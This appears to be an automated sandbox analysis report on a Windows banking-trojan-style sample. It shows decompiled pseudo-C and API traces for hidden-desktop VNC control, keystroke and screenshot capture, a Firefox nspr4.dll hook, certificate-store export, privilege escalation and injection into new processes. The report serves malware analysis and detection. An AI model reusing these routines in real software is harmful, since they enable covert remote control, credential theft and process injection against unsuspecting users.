0x00000000
0x00000000
0x0040b2d5
0x0040b1f2
0x0040b1f3
0x00000000
0x00000000
0x0040b1f9
0x0040b1fd
0x0040b200
0x0040b203
0x0040b208
0x0040b20a
0x00000000
0x00000000
0x0040b210
0x0040b214
0x0040b217
0x0040b21a
0x0040b21f
0x0040b221
0x00000000
0x00000000
0x0040b24d
0x0040b256
0x0040b258
0x0040b25a
0x0040b64e
0x00000000
0x0040b64e
0x0040b268
0x0040b26d
0x0040b26f
0x00000000
0x00000000
0x0040b278
0x0040b27e
0x0040b282
0x0040b282
0x0040b5a3
0x0040b5a8
0x0040b5ab
0x0040b5ab
0x00000000
0x0040b5b3
0x0040b071

APIs

Part of subcall function 0041944B: send.WS2_32(?,?,?,00000000), ref: 00419459

WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0040B0F1
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B10C
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B19E
GetSystemMetrics.USER32 ref: 0040B2B8

Part of subcall function 004193D4: recv.WS2_32(?,?,00000004,00000000), ref: 004193F8

ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B644

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Strings

RFB , xrefs: 0040AEDC
RFB 003.003, xrefs: 0040AEA2
, xrefs: 0040B5E9
x, xrefs: 0040B36D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: 4d892b7ac5429dfc5a9d26e8e41c457038575cd8fa9575927c649662359094b2
Instruction ID: edc5106e1785f27ff2afc4a9dee735c3b89bc1d66f1f7216970319086ace7fa5
Opcode Fuzzy Hash: 4d892b7ac5429dfc5a9d26e8e41c457038575cd8fa9575927c649662359094b2
Instruction Fuzzy Hash: F932DE31A00219AADF24DBA4C855BEEB7B5EF04344F04843AE956F72C2DB788E45C79D

Uniqueness

Uniqueness Score: -1.00%

Function 00405A43, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A43(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E004159A4(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E00405A1B(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E004159A4(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E004059D6(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E00405A1B(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x00405a43
0x00405a4e
0x00405a56
0x00405a59
0x00405a68
0x00405a6e
0x00405a73
0x00405a8c
0x00405a95
0x00405a9f
0x00405b2a
0x00405b2d
0x00405b33
0x00405b3a
0x00405b3a
0x00405aa5
0x00405aa8
0x00405aad
0x00405aaf
0x00405ab2
0x00405abc
0x00405abc
0x00405acd
0x00405ad1
0x00405ae7
0x00405afd
0x00405b0d
0x00405b0d
0x00405b11
0x00405b12
0x00405b1b
0x00000000
0x00000000
0x00000000
0x00405b1b
0x00405b00
0x00405b06
0x00405b0b
0x00000000
0x00000000
0x00000000
0x00405ad3
0x00405ae1
0x00405ae3
0x00405ae5
0x00405b1d
0x00405b1d
0x00405b20
0x00405b25
0x00405b25
0x00000000
0x00405b20
0x00000000
0x00405ae5
0x00405ad1
0x00405a7b
0x00405a81
0x00405a84
0x00405a86
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 00405A68
CreateWindowStationW.USER32 ref: 00405A7B
GetProcessWindowStation.USER32 ref: 00405A8C
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00405AC7
CreateDesktopW.USER32 ref: 00405ADB
GetCurrentThreadId.KERNEL32 ref: 00405AE7
GetThreadDesktop.USER32(00000000), ref: 00405AEE
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00405B00
CloseDesktop.USER32(00000000,00000000,00000000), ref: 00405B12
CloseWindowStation.USER32(?,?), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: e132bd08d8e76af3339f7f4f40a444f57ee3938c04d21d5ed9b7b0a744be2f12
Instruction ID: 739a9b8b45f5e9f40246e24c91d162f022398147c84233ab2b59d88c80c59f2b
Opcode Fuzzy Hash: e132bd08d8e76af3339f7f4f40a444f57ee3938c04d21d5ed9b7b0a744be2f12
Instruction Fuzzy Hash: E12178B1900648BFDF10ABA59C88D9F7EB8EB48394B04817AF801F3261D2399D45CE78

Uniqueness

Uniqueness Score: -1.00%

Function 0041618F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041618F(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E004068C0() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E00415FF2();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x4048ac);
						goto L19;
					}
					EnterCriticalSection(0x423148);
					if( *0x423140 > 0) {
						 *0x423140 =  *0x423140 + 0xffff;
						_t36 = 2;
						E004159A4(_t36,  &_v864);
						_t39 = E0040F20F( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E004159A4(0,  &_v840);
							_t65 =  &_v884;
							E004159A4(1, _t65);
							_t45 =  *0x423138;
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E00417114( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E004057E9(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x422bb0, GetTickCount());
						}
					}
					LeaveCriticalSection(0x423148);
					goto L20;
				}
			}

0x00416195
0x0041619c
0x004161a3
0x004162e5
0x004162f2
0x004161b6
0x004161b6
0x004161be
0x00416274
0x00416279
0x00000000
0x00000000
0x0041627b
0x0041627f
0x00000000
0x00000000
0x00416286
0x0041628c
0x0041628e
0x00000000
0x00000000
0x004162ae
0x004162b4
0x004162b6
0x00000000
0x00000000
0x004162b8
0x004162bb
0x004162ca
0x004162d4
0x004162d4
0x004162d6
0x004162df
0x004162e0
0x004162e0
0x00000000
0x004162e0
0x004162cc
0x004162cc
0x004162d2
0x00000000
0x00000000
0x00000000
0x004162d2
0x004162bd
0x004162c1
0x00000000
0x00000000
0x004162c3
0x00000000
0x004162c3
0x004161c9
0x004161d7
0x004161e2
0x004161ef
0x004161f0
0x004161ff
0x00416204
0x0041620a
0x00416212
0x00416219
0x0041621e
0x00416223
0x0041622a
0x0041622c
0x0041622c
0x0041624d
0x00416252
0x0041625c
0x00416264
0x00416264
0x0041620a
0x0041626c
0x00000000
0x0041626c

APIs

TranslateMessage.USER32(?), ref: 004162E6

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

EnterCriticalSection.KERNEL32(00423148), ref: 004161C9
LeaveCriticalSection.KERNEL32(00423148), ref: 0041626C

Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040F241
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040F252
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 0040F25F
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 0040F26C
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0040F279
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 0040F286
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 0040F293
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 0040F2A0
Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(ole32.dll), ref: 0040F2E8
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040F2F3
Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040F305
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040F310
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040F31C
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040F329
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040F336
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040F343
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040F350
Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040F35D

GetTickCount.KERNEL32 ref: 0041622E
GetKeyboardState.USER32(?), ref: 00416286
ToUnicode.USER32 ref: 004162AE

Strings

, xrefs: 004162CC

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: 68a89a1532fdb861f9ce505db7757530dc63daebb5dd93b2d9139a78137cd745
Instruction ID: 25cc6646fa3b7964fae8e23ff5c2ce21956ef4716a97fc04752330741e403ae2
Opcode Fuzzy Hash: 68a89a1532fdb861f9ce505db7757530dc63daebb5dd93b2d9139a78137cd745
Instruction Fuzzy Hash: AB31E0326003019BDB20AFA5DC49AEB77A8AF44354F04487BF914EB191E739C984C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00412425, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00412425(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t12;
				long _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				UNICODE_STRING* _t24;
				void* _t28;
				HMODULE* _t29;
				struct _OBJDIR_INFORMATION _t31;

				if(E004068C0() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x422974(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x4230fc);
						if(( *0x423114 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E00409AF5(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x423114 =  *0x423114 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x4230fc);
					}
					return _a4;
				}
				goto ( *0x422970);
			}

0x0041242f
0x0041243a
0x0041243e
0x00412448
0x00412458
0x0041245e
0x00412463
0x0041247c
0x00412489
0x0041248e
0x0041249e
0x004124a9
0x004124a0
0x004124a2
0x004124a2
0x004124ad
0x004124af
0x004124af
0x004124ad
0x004124b7
0x004124b7
0x004124c4
0x004124c4
0x00412432

APIs

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00412448
LdrLoadDll.NTDLL(?,?,?,?), ref: 00412458
EnterCriticalSection.KERNEL32(004230FC), ref: 0041247C
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00412496
LeaveCriticalSection.KERNEL32(004230FC), ref: 004124B7

Strings

nspr4.dll, xrefs: 00412490
@xw, xrefs: 00412432, 00412458

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
String ID: @xw$nspr4.dll
API String ID: 2984399785-1669710511
Opcode ID: f282968c9997229927802696484d7bc45f9fa5496869b87095130ca62136edc4
Instruction ID: 443c47b78df71ffe60bbbcd779b3dc73fc8c52b75bf82f32d4d440a8bd1fbcd2
Opcode Fuzzy Hash: f282968c9997229927802696484d7bc45f9fa5496869b87095130ca62136edc4
Instruction Fuzzy Hash: 5211C131200214EBCB205F51EE44BE77B78FF45755F004066FD45A7221CBBD9DA28AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0B2, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004033D0), ref: 0040C0CD
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C0E9
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040C0F5
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C134
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C164
CharLowerW.USER32(?,?,00000000,00000001), ref: 0040C182
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0040C18D
CertCloseStore.CRYPT32(?,00000000), ref: 0040C216

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: b58316b79dbcadeb8b0cc32fa38720b70a04efa3c78de1c5f8aa53c5e9c31584
Instruction ID: de6a937b33ce2f0b4ea77f33d40ecacfefb81dbb74e049520a5b01d07cd62254
Opcode Fuzzy Hash: b58316b79dbcadeb8b0cc32fa38720b70a04efa3c78de1c5f8aa53c5e9c31584
Instruction Fuzzy Hash: 2B418671508341EBD7119F95DC81AAFBBDCEB88744F000A3FB994F21A1D638D9498766

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB58, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041BB58(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0041BCB4("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0041B8B4( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0041BCB4( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0041BB58( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0041bb75
0x0041bb79
0x0041bb7d
0x0041bb84
0x0041bcab
0x0041bcb1
0x0041bcb1
0x0041bb97
0x0041bb9d
0x0041bba4
0x0041bbaa
0x0041bbb3
0x0041bbb3
0x0041bbb8
0x00000000
0x00000000
0x0041bbda
0x0041bc8a
0x0041bc9b
0x00000000
0x00000000
0x00000000
0x0041bc9b
0x0041bbe4
0x0041bbe7
0x0041bbf0
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbf7
0x0041bbf7
0x0041bbfa
0x0041bc37
0x0041bc3c
0x0041bc5c
0x0041bc60
0x0041bc65
0x0041bc65
0x0041bc85
0x0041bc85
0x00000000
0x0041bc3c
0x0041bbfc
0x0041bc12
0x0041bc16
0x00000000
0x00000000
0x00000000
0x0041bc18
0x0041bc25
0x0041bc28
0x0041bc2a
0x00000000
0x00000000
0x0041bc2c
0x0041bc30
0x0041bc35
0x0041bc35
0x00000000
0x0041bc30
0x0041bbe7
0x0041bca5
0x0041bca5

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0041BC35
Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: 162b816ae40fff88f59789b468e01d4d31f6b4f974f153e0717fcae5b64ac91a
Instruction ID: f7fa20dad1014f0554ede9088ea338ae8c2f9cf2e53501d052d845fba7f2c1e9
Opcode Fuzzy Hash: 162b816ae40fff88f59789b468e01d4d31f6b4f974f153e0717fcae5b64ac91a
Instruction Fuzzy Hash: 24415D310082099BCB21DF15DD48ADF7BA5EF84344F00492EF994922A1EB39D996CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00417AED, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417AED(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x00417af8
0x00417b0c
0x00417b2b
0x00417b33
0x00417b42
0x00417b63
0x00417b63
0x00417b68
0x00000000
0x00417b20
0x00000000
0x00417b20

APIs

GetCurrentThread.KERNEL32 ref: 00417AFD
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16
LookupPrivilegeValueW.ADVAPI32(00000000,0040E7CE,?), ref: 00417B3A
AdjustTokenPrivileges.ADVAPI32(0040E7CE,00000000,00000001,00000000,00000000,00000000), ref: 00417B4F
GetLastError.KERNEL32 ref: 00417B59
CloseHandle.KERNEL32(0040E7CE), ref: 00417B68

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: ad5f9cfdd1ada848cc08bf6bbc4491fc18ca176c9e402f1a99104861d7ef6d13
Instruction ID: 10ba094e22f2f7c91229282b227bfb325925309097b7317705a00dda049a8a59
Opcode Fuzzy Hash: ad5f9cfdd1ada848cc08bf6bbc4491fc18ca176c9e402f1a99104861d7ef6d13
Instruction Fuzzy Hash: DE010071A04208BFEB105FA19D89FEF7BBCAF05788F104166F611E21A0E77499848A69

Uniqueness

Uniqueness Score: -1.00%

Function 004122FC, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004122FC(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;
				void* _t65;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x422964(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E004068C0() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E004066F1(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E004067D5(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x422954 + E00406F49;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							_t65 = _v720.Eip -  *0x42296c; // 0x77e5ba60
							if(_t65 != 0) {
								goto L12;
							} else {
								if(( *0x422940 & 0x00000010) != 0) {
									_t55 = _t55 ^ _v720.Eax;
								}
								_v720.Eax = _t55;
								_v720.ContextFlags = 0x10002;
								if(SetThreadContext( *_t50,  &_v720) == 0) {
									goto L12;
								}
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x004122fc
0x00412309
0x00412328
0x0041232e
0x00412333
0x00412373
0x00412378
0x0041237b
0x0041237d
0x00412383
0x0041238a
0x0041238f
0x00412392
0x0041239a
0x004123a6
0x004123ac
0x004123be
0x00412400
0x0041240c
0x004123c0
0x004123c6
0x004123cc
0x00000000
0x004123ce
0x004123d5
0x004123d7
0x004123d7
0x004123e6
0x004123ec
0x004123fe
0x00000000
0x00000000
0x004123fe
0x004123cc
0x00412415
0x0041241c
0x0041237d
0x00412422

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00412328

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

GetProcessId.KERNEL32(?), ref: 00412364

Part of subcall function 004066F1: CreateMutexW.KERNEL32(00422978,00000001,?,00422BB8,74B5F560,?,00000002,?,74B5F560), ref: 00406739
Part of subcall function 004066F1: GetLastError.KERNEL32 ref: 00406745
Part of subcall function 004066F1: CloseHandle.KERNEL32(00000000), ref: 00406753

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004123B6
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004123F6
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0041240C
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00412415

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
String ID:
API String ID: 1044471028-0
Opcode ID: 7763b8973ad993beef1afbfcce2c01d04102c6571c4b6563e24f2d50315a1080
